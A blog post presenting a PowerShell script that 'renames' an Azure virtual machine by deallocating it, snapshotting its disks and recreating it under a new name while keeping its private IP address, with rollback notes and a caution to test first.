Elliott Leighton-Woodruff - Tags: Azure, Virtual Machines, Powershell Learn how to rename Azure VMs while retaining private IP addresses using PowerShell automation. Changes happen and sometimes there is a requirement to change the name of a virtual machine, be it from an error or a change of naming convention internally. Natively within Azure there is currently no way to rename a virtual machine, its virtual network or the disks attached too it, forcing users to either give up on name changes or build out new virtual machines and migrate disks. Whilst there are some scripts available already that run through the process these did not meet my specific needs, primarily of retaining the internal private IP address. As when amended on mass it’s a sizeable task to manually adjust all network adapters. This script completes the following actions; 1. Collects VM variables 2. Shuts down and deallocates VM 3. Creates new VM 4. Creates new network adapter 5. Changes legacy network adapter IP to spare IP 6. Creates IP configuation for new adapter 7. Applies new adapter to new VM 8. Creates snapshot of legacy OS disk and copies to new VM 9. Creates snapshot of remaining disks and copies to new VM 10. Finalises config and deploy machine In order to roll back, simply shutdown the new VM, start the stopped/deallocated vm and reapply the static IP address needed The below script is given without any guarantee and as such I would suggest you test first as Azure services often update. This script can be amended to include a foreach statement and import a CSV however I may update this later. ``` ####Variables### $vmname = "VMName" $rgname = "ResourceGroupName" $vmnewname = "NewVMName" $SpareIP = "172.0.0.199" ###General### $VMsource = get-azvm -Name $vmname -ResourceGroupName $rgname #check offline $VMsourcestatus = (get-azvm -Name $VMsource.Name -ResourceGroupName $VMsource.ResourceGroupName -Status).Statuses | where-object code -like "PowerState*" if ($VMsourcestatus -ne "VM deallocated") { stop-azVm -Name $VMsource.Name -ResourceGroupName $VMsource.ResourceGroupName -Force Start-Sleep -Seconds 30 } #creates new VM object# $NewVmObject = New-AzVMConfig -VMName $vmnewname -VMSize $VMsource.HardwareProfile.VmSize ###Networking### #creates new network adapter# #network name# $networkID = (Get-AzNetworkInterface -ResourceId $VMsource.NetworkProfile.NetworkInterfaces[0].id).name #network ip# $IPAddress = (Get-AzNetworkInterface -ResourceId $VMsource.NetworkProfile.NetworkInterfaces[0].id).IpConfigurations.PrivateIpAddress #network subnetID# $subnetID = (Get-AzNetworkInterface -ResourceId $VMsource.NetworkProfile.NetworkInterfaces[0].id).IpConfigurations.Subnet.id #Re-address legacy adapter# $Legnic = Get-AzNetworkInterface -ResourceGroupName $VMsource.ResourceGroupName -Name $networkID $Legnic.IpConfigurations[0].PrivateIpAddress = $SpareIP $Legnic.IpConfigurations[0].PrivateIpAllocationMethod = "Static" Set-AzNetworkInterface -NetworkInterface $Legnic #creates ipcofiguration# $IPconfig1 = New-AzNetworkInterfaceIpConfig ` -Name "IPConfig1" ` -PrivateIpAddressVersion IPv4 ` -PrivateIpAddress $IPAddress ` -SubnetId $SubnetId ` -primary #creates new virtual nic# $nic = New-AzNetworkInterface ` -Name "$($vmnewname.ToLower())-0-nic" ` -ResourceGroupName $VMsource.ResourceGroupName ` -Location $VMsource.Location ` -IpConfiguration $IPconfig1 #adds virtual nic to VM# Add-AzVMNetworkInterface -VM $NewVmObject -Id $nic.Id ###Disks### #creates new OS disk# $VMsourcedisksku = (get-azdisk -ResourceGroupName $VMsource.ResourceGroupName -DiskName $VMsource.StorageProfile.OsDisk.name).Sku.Name $VMsourcedisksnap = New-AzSnapshotConfig -SourceUri $VMsource.StorageProfile.OsDisk.ManagedDisk.Id -Location $VMsource.Location -CreateOption copy $SourceOsDiskSnap = New-AzSnapshot -Snapshot $VMsourcedisksnap -SnapshotName "$($VMsource.Name)-os-snap" -ResourceGroupName $VMsource.ResourceGroupName $VMtargetdiskconf = New-AzDiskConfig -AccountType $VMsourcedisksku -Location $VMsource.Location -CreateOption Copy -SourceResourceId $SourceOsDiskSnap.Id $VMtargetdisk = New-AzDisk -Disk $VMtargetdiskconf -ResourceGroupName $VMsource.ResourceGroupName -DiskName "$($vmNewName.ToLower())-os-vhd" Set-AzVMOSDisk -VM $NewVmObject -ManagedDiskId $VMtargetdisk.Id -CreateOption Attach -Windows #creates remaing disks# Foreach ($SourceDataDisk in $VMsource.StorageProfile.DataDisks) { $SourceDataDiskSku = (get-azdisk -ResourceGroupName $VMsource.ResourceGroupName -DiskName $SourceDataDisk.name).Sku.Name $SourceDataDiskSnapConfig = New-AzSnapshotConfig -SourceUri $SourceDataDisk.ManagedDisk.Id -Location $VMsource.Location -CreateOption copy $SourceDataDiskSnap = New-AzSnapshot -Snapshot $SourceDataDiskSnapConfig -SnapshotName "$($VMsource.Name)-$($SourceDataDisk.name)-snap" -ResourceGroupName $VMsource.ResourceGroupName $TargetDataDiskConfig = New-AzDiskConfig -AccountType $SourceDataDiskSku -Location $VMsource.Location -CreateOption Copy -SourceResourceId $SourceDataDiskSnap.Id $TargetDataDisk = New-AzDisk -Disk $TargetDataDiskConfig -ResourceGroupName $VMsource.ResourceGroupName -DiskName "$($vmNewName.ToLower())-$($SourceDataDisk.lun)-vhd" #create each new disk# Add-AzVMDataDisk -VM $NewVmObject -Name "$($vmnewname.ToLower())-$($SourceDataDisk.lun)-vhd" -ManagedDiskId $TargetDataDisk.Id -Lun $SourceDataDisk.lun -CreateOption "Attach" } ###Final Phase### #creates new VM with varibles# New-AzVM -VM $NewVmObject -ResourceGroupName $VMsource.ResourceGroupName -Location $VMsource.Location -Verbose ```